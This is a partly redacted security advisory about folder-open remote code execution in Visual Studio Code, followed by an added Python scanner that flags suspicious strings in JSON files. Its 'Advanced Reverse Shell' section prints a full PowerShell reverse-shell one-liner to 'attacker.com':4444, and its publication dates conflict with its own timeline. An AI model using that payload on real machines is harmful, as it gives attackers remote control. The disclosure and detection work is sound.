0DAYSECADVISORY

Arbitrary Remote Code Execution via ██ in Visual Studio Code

Vendor: Microsoft
Affected: Visual Studio Code (< 1.101.2)
Severity: Critical
Patch Status: Unpatched
Published: January 20, 2025
Discovered: January 15, 2025

Arbitrary Remote Code Execution via ██████████ Visual Studio Code Bypassing ████████████

Executive Summary

I discovered a critical security vulnerability in Microsoft Visual Studio Code’s runner framework that allows attackers to achieve arbitrary remote code execution on victim machines. The vulnerability exploits the automatic execution feature in VS Code’s █████████████████████, bypassing █████, and enables malicious code to run silently when a user opens a project folder.

Vulnerability Details

████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████

Root Cause Analysis

█████████████████████████████████████████████████████████████████████████████████████████████████████████

Key Security Flaws:

  1. █████████████████████
  2. ███████████████████████████████████████████████████████████████
  3. █████████████████████
  4. █████████████████████████████████████████████████████████████████████████████████████████████████████████

Proof of Concept

Malicious Repository Setup

Step 1: Create Bypass Malicious Structure

█████████████████████
██████████████████████████████████████████
███████████████████████████████████████████████████████████████
█████████████████████
██████████████████████████████████████████
█████████████████████
█████████████████████

Step 3: Repository Distribution

█████████████████████

Exploitation Flow

███████████████

Advanced Reverse Shell

█████████████████████

{
      "args": [
        "████████████", "██████",
        "█████████",
        "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
      ],
      }
  ]
}
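
The fragment above carries its payload as a string inside a JSON "args" array. As an added example (not part of the original advisory or the researcher's code), the following Python scanner checks the JSON files of a cloned repository for such strings before the folder is opened in an editor. The indicator list, the sample input and its keys are constructed here, and because the affected file name is redacted, the scan assumes every *.json file is in scope.

```python
import re
from pathlib import Path

# Indicators copied from the payload string visible in the advisory's fragment.
# Any single hit is a triage lead, not a verdict.
INDICATORS = {
    "tcp-client": re.compile(r"System\.Net\.Sockets\.TCPClient", re.I),
    "dynamic-eval": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I),
    "raw-stream": re.compile(r"\.GetStream\(\)", re.I),
}

# Matches JSON string literals without parsing the file, so comments and
# trailing commas (as in the fragment above) do not hide a string from the scan.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed sample: placeholder host, truncated command, hypothetical keys.
SAMPLE = '''{
  // constructed sample, not the redacted file from the advisory
  "args": [
    "placeholder-arg",
    "$c = New-Object System.Net.Sockets.TCPClient('host.example',4444); $s = $c.GetStream(); iex $d",
  ],
  "label": "build"
}'''


def scan_text(text):
    """Return [(line_number, [indicator names])] for each matching string literal."""
    hits = []
    for match in STRING_LITERAL.finditer(text):
        names = sorted(n for n, rx in INDICATORS.items() if rx.search(match.group(1)))
        if names:
            hits.append((text.count("\n", 0, match.start()) + 1, names))
    return hits


def scan_repo(root):
    """Scan every *.json file under root (dot-directories included)."""
    findings = {}
    for path in sorted(Path(root).rglob("*.json")):
        if path.is_file():
            hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


if __name__ == "__main__":
    for line, names in scan_text(SAMPLE):
        print(f"line {line}: {', '.join(names)}")
```

The scan matches literal text only, so a string written with JSON \u escapes or split across concatenated arguments would need decoding before matching.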

MSRC Response and Timeline

Disclosure Timeline

Date        Event                        Status
2025-01-15  Initial discovery            Vulnerability identified
2025-03-16  PoC development              Exploitation confirmed
2025-07-17  Microsoft MSRC notification  Report submitted
2025-07-30  MSRC Acknowledgment          Bounty Appreciated $**K
2025-08-05  Redacted disclosure          Advisory published
PENDING     Patch development            Pending CVEs

Conclusion

This vulnerability represents a critical security flaw in one of the world’s most popular code editors, affecting millions of developers globally. The ability to ██████ arbitrary code execution through a ██████ ███ bypass file poses significant risks to individual developers, enterprises, and the broader software supply chain.

Vulnerability MSRC

Report ID ↓

Acknowledgements

Discovered by: @odaysec (ZDG Asian Groups)
Research Team: Zeroday ZDG Asian Groups
Disclosure Pending: Coordinated disclosure via Microsoft MSRC


This advisory is currently in a restricted disclosure phase. Due to the sensitive nature of the vulnerability and the potential for exploitation prior to coordinated disclosure, detailed write-ups, exploit proofs-of-concept, and payload samples are temporarily redacted. Full technical details will be released once the CVE assignment is confirmed and the vendor’s patch is publicly available.